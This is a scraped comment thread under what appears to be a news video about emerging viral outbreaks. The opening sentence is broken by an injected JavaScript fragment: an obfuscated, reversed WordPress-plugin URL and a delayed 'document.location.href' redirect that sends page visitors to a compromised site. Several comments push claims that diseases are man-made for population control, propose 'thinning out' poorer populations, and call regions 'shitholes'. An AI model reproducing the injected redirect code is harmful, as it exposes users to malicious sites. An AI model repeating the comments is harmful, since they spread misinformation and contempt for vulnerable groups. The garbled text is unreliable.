Since the 1980s, outbreaks of infectious diseases have more than tripled worldwide. For example, one million people die each year from mosquitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-borne illness. You know what, truth has been gone from this country's government for many many years. It didn't just start now with Trump and I am sick of seeing things about how now this country is this or that and truth is that it has been fucked up for years so people need to actually use their brains and quit.

"what we did in the lab is nothing different than what is happening and animals around the globe everyday".. The big difference is humans could intentionally weaponize viruses against different groups of people… And if anyone doesn't believe that most Industrial countries do not have Secret weaponized germ/ virus you are sadly mistaken…

  16. SuicidelG says:

Have we considered just thinning out the population in poorer areas? I mean it sounds like they re a threat to us…

  31. Plex Tonium says:

Viruses created and  introduced by Europeans…but successfully misinformed the world of viral origins… This all started after the 2nd world war when biological weapons was being used and also seriously considered between Nazis and the west. But now being used as population control…"The Truth will set you free but first it will piss you off"

Now get this: thanks to Trump and his idiot lackeys with their anti-science propaganda the chance of not catching the next big outbreak and responding to it is increasing exponentially day by day.

  39. enigmaPL says:

How about the people in Zika and elsewhere just act like civilized people? Isn't it about time? How hard is it to keep a clean working area when working with food and animals. Clean the cages, clean the area around, clean the tables… and maintain some basic common sense hygiene. It's not difficult. These people act like there's no way around it? Why do we need to be ready for viruses just because shitholes are unwilling to clean up after themselves? Ridiculous.

This is what I subscribed to Vice for

  41. The Silent Patriot says:

I believe these “diseases” are man made. The Native Americans did not have to deal with Ebola, SARS, etc. they dealt with smallpox because of the settlers. I don’t believe in this crap coming from animals.

  46. Milena K says:

Great video. This is the VICE News that I like to see!

  47. George Rivera says:

It may be that the developed world is looking to the jungles of African countries for evolving viral threats, but that is where they exist. Selfish motives and subjective opinions aside, a strategy that involves taking a fight to an enemy that is <1400 manometers long by 20-400 nm in diameter is no easy feat. They wait to conquer the world and that is where the battle must be fought and won. For all it's faults, the destiny of all humankind depends on it.

Viruses exist in the jungles of the world waiting for a transmission host to destroy all creation. We can defeat it out it will defeat is.
